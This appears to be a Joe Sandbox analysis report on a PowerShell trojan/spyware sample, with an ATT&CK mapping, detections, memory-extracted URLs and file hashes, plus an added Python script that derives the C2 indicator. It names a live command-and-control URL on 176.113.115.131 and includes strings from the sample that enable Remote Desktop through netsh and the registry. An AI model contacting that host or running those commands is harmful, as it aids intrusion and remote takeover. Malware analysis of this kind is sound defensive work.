RU=UCyxSzKa7z5ccQY=MepzHI==MepAF9==MepzG9==MepAGI==QYKA6eKl7zJWbQBkXv==Oed8ciKwSymjFuIp0RllLXhiIiGj6Uii4RxnJwcmJHcugQy9IdpoCaqR4R1gcXZ0JIIlOgW7XvLvIA==JdNiKP7g7xI=IdpoCaqpSR4bIxNoBs==UBY5SPyq4BVncw9lfLY=LRK6SOCS7BlqchFvcLpojQzoXLRydGRtaR3wSOF8EPZkcAYgJl==Ib==cX737yGm7X4bMRQgM2UlRy==cYFa6o==chuwSyYkSXK7ReY96hQbUAJ5c8Z52DzoXLnyYWM=MypyFvpRFOk=MypyFvpRFeI=MypyFvpRFeM=MypyFvpRFXY=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 311 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | 1 Remote Desktop Protocol | 1 Screen Capture | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 141 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 311 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 2 File and Directory Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 44 System Information Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Source | Detection | Scanner | Label | Link
                nYT1CaXH9N.ps1 | 8% | Virustotal | | Browse
                nYT1CaXH9N.ps1 | 24% | ReversingLabs | Win32.Trojan.Generic |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://176.113.115.131/8Fvu5jh4DbS/index.phpl | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpW-; | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpd | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.php | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpXNtM2ZDgETkWRZnZWM= | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpb | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpn- | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.php- | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpmmon | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpj | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phped/ | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpZ- | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpK | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phped | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpV | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.php)- | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpx | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpE | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpedY | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpdK | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.php0 | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpw | 0% | Avira URL Cloud | safe |
                http://176.113.115.131/8Fvu5jh4DbS/index.phpq | 0% | Avira URL Cloud | safe |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://176.113.115.131/8Fvu5jh4DbS/index.php | true | Avira URL Cloud: safe | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://176.113.115.131/8Fvu5jh4DbS/index.php- | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phpl | RegSvcs.exe, 00000003.00000002.4127608803.0000000001473000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1864550591.00000296DC2DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://176.113.115.131/8Fvu5jh4DbS/index.phpj | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1840009085.00000296CD63F000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://176.113.115.131/8Fvu5jh4DbS/index.phpd | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1840009085.00000296CD63F000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://go.micro | powershell.exe, 00000000.00000002.1840009085.00000296CCC64000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://176.113.115.131/8Fvu5jh4DbS/index.phpW-; | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phpn- | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phpXNtM2ZDgETkWRZnZWM= | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://contoso.com/License | powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://176.113.115.131/8Fvu5jh4DbS/index.phpb | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://contoso.com/Icon | powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://upx.sf.net | Amcache.hve.0.dr | false | | high
                http://176.113.115.131/8Fvu5jh4DbS/index.phpmmon | RegSvcs.exe, 00000003.00000002.4127608803.0000000001407000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phpV | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1840009085.00000296CD63F000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://176.113.115.131/8Fvu5jh4DbS/index.phped/ | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phpK | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phpJ | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phpZ- | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phpE | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phpD | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phped | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://contoso.com/ | powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1864550591.00000296DC2DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://oneget.orgX | powershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://176.113.115.131/8Fvu5jh4DbS/index.php)- | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phpdK | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phpedY | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://176.113.115.131/8Fvu5jh4DbS/index.phpx | RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1840009085.00000296CBA71000.00000004.00000800.00020000.00000000.sdmp | false
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1840009085.00000296CBA71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://176.113.115.131/8Fvu5jh4DbS/index.phpwRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://176.113.115.131/8Fvu5jh4DbS/index.phpqRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://oneget.orgpowershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://176.113.115.131/8Fvu5jh4DbS/index.php0RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
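The table above lists every URL-shaped string found in the RegSvcs.exe and powershell.exe memory dumps. The characters after index.php (K, Z-, )-, 0, ...) are whatever bytes happened to follow the URL in memory, so fourteen rows describe a single C2 endpoint, while the powershell.exe rows (contoso.com, nuget.org, oneget.org, aka.ms/pscore6) are strings from the PowerShell host process rather than from the sample. The Python below is an added example, not part of the Joe Sandbox report: it parses the rows exactly as the flattened table glues them together and reduces each (process, host) group to its longest common prefix, which recovers the URL the code actually used. The row text is copied from the table; the two process names used as parse anchors are the two the table contains.

```python
import os
import re
from collections import defaultdict

# Rows copied from the URL table above, exactly as the flattened table glues
# URL + "<process>, <memory dump>" + Malicious flag together (constructed input).
RAW_ROWS = [
    "http://176.113.115.131/8Fvu5jh4DbS/index.phped/RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.phpKRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.phpJRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.phpZ-RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.phpERegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.phpDRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.phpedRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://contoso.com/powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmpfalse",
    "https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1864550591.00000296DC2DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmpfalse",
    "https://oneget.orgXpowershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.php)-RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.phpdKRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.phpedYRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.phpxRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://aka.ms/pscore68powershell.exe, 00000000.00000002.1840009085.00000296CBA71000.00000004.00000800.00020000.00000000.sdmpfalse",
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1840009085.00000296CBA71000.00000004.00000800.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.phpwRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.phpqRegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://oneget.orgpowershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmpfalse",
    "http://176.113.115.131/8Fvu5jh4DbS/index.php0RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmpfalse",
]

# The process names are the only reliable separator between the memory string
# and the source column, so they are matched literally rather than as \w+.exe.
ROW_RE = re.compile(
    r"^(?P<url>.+?)"                                          # string as found in memory
    r"(?P<proc>RegSvcs\.exe|powershell\.exe), "               # first source process
    r"(?P<dump>[0-9A-F.]+\.sdmp)"                             # its memory-dump id
    r"(?:, (?:RegSvcs|powershell)\.exe, [0-9A-F.]+\.sdmp)*"   # further sources, if any
    r"(?P<malicious>true|false)$"
)
HOST_RE = re.compile(r"^(?P<scheme>https?)://(?P<host>[^/:]+)")


def parse_rows(rows):
    """Split each flattened row into url / proc / dump / malicious."""
    parsed = []
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            raise ValueError(f"unrecognised row layout: {row[:60]}...")
        parsed.append(m.groupdict())
    return parsed


def canonical_host(host, hosts):
    """Fold a host with a garbage byte glued on (oneget.orgX) into the clean
    host it extends (oneget.org), provided the clean form was also observed."""
    shorter = [h for h in hosts if h != host and host.startswith(h)]
    return min(shorter, key=len) if shorter else host


def normalise(parsed):
    """One indicator per (process, host): the longest common prefix of all
    memory-string variants, plus how many variants were seen."""
    by_proc = defaultdict(list)
    for p in parsed:
        h = HOST_RE.match(p["url"])
        if h:
            by_proc[p["proc"]].append((h.group("host"), p["url"]))
    result = {}
    for proc, items in by_proc.items():
        hosts = {host for host, _ in items}
        groups = defaultdict(list)
        for host, url in items:
            groups[canonical_host(host, hosts)].append(url)
        for host, variants in groups.items():
            result[(proc, host)] = (os.path.commonprefix(variants), len(variants))
    return result


def c2_indicators(rows):
    """Indicators from the injected RegSvcs.exe image only; the PowerShell
    host's own module strings (nuget.org, oneget.org, ...) are left out."""
    return {
        host: prefix_count
        for (proc, host), prefix_count in normalise(parse_rows(rows)).items()
        if proc == "RegSvcs.exe"
    }


if __name__ == "__main__":
    for host, (url, seen) in c2_indicators(RAW_ROWS).items():
        print(f"{host}: {url}  (seen {seen}x)")
```

The common prefix is only a faithful recovery when the variants diverge right after the real URL; had the dump contained only the index.phped variants, the result would have been index.phped. Likewise a garbage byte glued straight onto a bare host (oneget.orgX) can only be folded away because the clean string was also present in the same dump.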
IP | Domain | Country | ASN | ASN Name | Malicious
176.113.115.131 | unknown | Russian Federation | 49505 | SELECTELRU | true
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1585766
                                                  Start date and time:2025-01-08 08:41:06 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 7m 25s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:10
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:nYT1CaXH9N.ps1
                                                  renamed because original name is a hash value
                                                  Original Sample Name:ab733235a722c734fb8f19160825cef1.ps1
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winPS1@8/10@0/1
                                                  EGA Information:
                                                  • Successful, ratio: 50%
                                                  HCA Information:
                                                  • Successful, ratio: 86%
                                                  • Number of executed functions: 26
                                                  • Number of non-executed functions: 96
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .ps1
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.190.159.64, 4.245.163.56, 13.107.253.45
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target powershell.exe, PID 6544 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
Time | Type | Description
02:41:57 | API Interceptor | 41x Sleep call for process: powershell.exe modified
02:41:58 | API Interceptor | 11890654x Sleep call for process: RegSvcs.exe modified
02:42:13 | API Interceptor | 1x Sleep call for process: wermgr.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SELECTELRU | iy2.dat.exe | malicious | XWorm | 176.113.115.170
SELECTELRU | z0r0.sh4.elf | malicious | Mirai | 82.148.27.5
SELECTELRU | K27Yg4V48M.exe | malicious | LummaC | 176.113.115.19
SELECTELRU | IH5XqCdf06.exe | malicious | LummaC | 176.113.115.19
SELECTELRU | J18zxRjOes.exe | malicious | LummaC | 176.113.115.19
SELECTELRU | 176.113.115_1.170.ps1 | malicious | XWorm | 176.113.115.170
SELECTELRU | botx.sh4.elf | malicious | Mirai | 178.132.202.249
SELECTELRU | TUp6f2knn2.exe | malicious | LummaC | 176.113.115.19
SELECTELRU | sqJIHyPqhr.exe | malicious | LummaC | 176.113.115.19
SELECTELRU | https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpeg | malicious | HTMLPhisher | 82.202.242.100
                                                  Process:C:\Windows\System32\wermgr.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.531657160926199
                                                  Encrypted:false
                                                  SSDEEP:96:zyFMjfVrxYidNRH3Uje0e35/3ooLF1QXIGZAX/d5FMT2SlPkpXmTAqUf/VXT5NHn:2A9mGNR30m8AzuiFckZ24lO8
                                                  MD5:4F50282A28993C1E65E5539AB1F7C3EA
                                                  SHA1:269854EF0F7C7BAFD5932BFD508E218355966CCE
                                                  SHA-256:94CBE5C3E3F402C4B0B9375CC5C8263590166281C99AD42A44F1D1FC3CEDE774
                                                  SHA-512:1A513F0BAB39A7627EF5CE64C62F5D467C27884D05138C753092CAD5955C6AD08F74B3E271D437F51A3825D9D8DACFA727D38EF801B0FD9075CB9ED062069BDF
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.7.9.5.7.6.6.0.6.6.1.4.5.5.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.7.9.5.7.1.9.0.1.8.1.9.2.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.f.e.a.8.8.f.-.d.6.f.7.-.4.0.f.b.-.b.d.d.b.-.b.e.4.b.e.f.c.a.8.a.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.9.0.-.0.0.0.1.-.0.0.1.4.-.f.8.a.e.-.8.8.c.a.a.0.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                                                  Process:C:\Windows\System32\wermgr.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):7288
                                                  Entropy (8bit):3.732108584879017
                                                  Encrypted:false
                                                  SSDEEP:96:RSIU6o7wVetbrEQAIBi6YR7/KVRtjcvZgmfHNpX6PrFE5aMibm:R6l7wVeJrEgBi6Y9yVRtOgmftY+pibm
                                                  MD5:EE49955FEB8EABACE9450D2BD0B011C9
                                                  SHA1:04F3D999DB2A6E949C652EC07B4198407BB66CE3
                                                  SHA-256:9142E6097758DBB8A05048968C3F70E9206D34B7A8C8D64BD89F25AFC35F3569
                                                  SHA-512:BF80E46F4CA589D7DFEE8782ABC1841C25742D32BBAE78C041349C8CC20EBC4C97032FA7A3639C1EB30D62686E208666E76474AB4DE873C42D7C9C7D7A88E436
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.4.4.<./.P.i.
                                                  Process:C:\Windows\System32\wermgr.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4905
                                                  Entropy (8bit):4.686305846161819
                                                  Encrypted:false
                                                  SSDEEP:96:uIjfYI7On7VHJFKloFevAFqvWTzFevAFuJufqd:uIMYOn7j45H+slJufI
                                                  MD5:8DB06691CE92511BE5F47051B8462ECD
                                                  SHA1:BC4DED9A9372D468D23557232E3A90D0A3528E64
                                                  SHA-256:D1D85481AA84A0C719B6A516FD2EB8CD209F63C7DD4E023260AEA03911AD3FB1
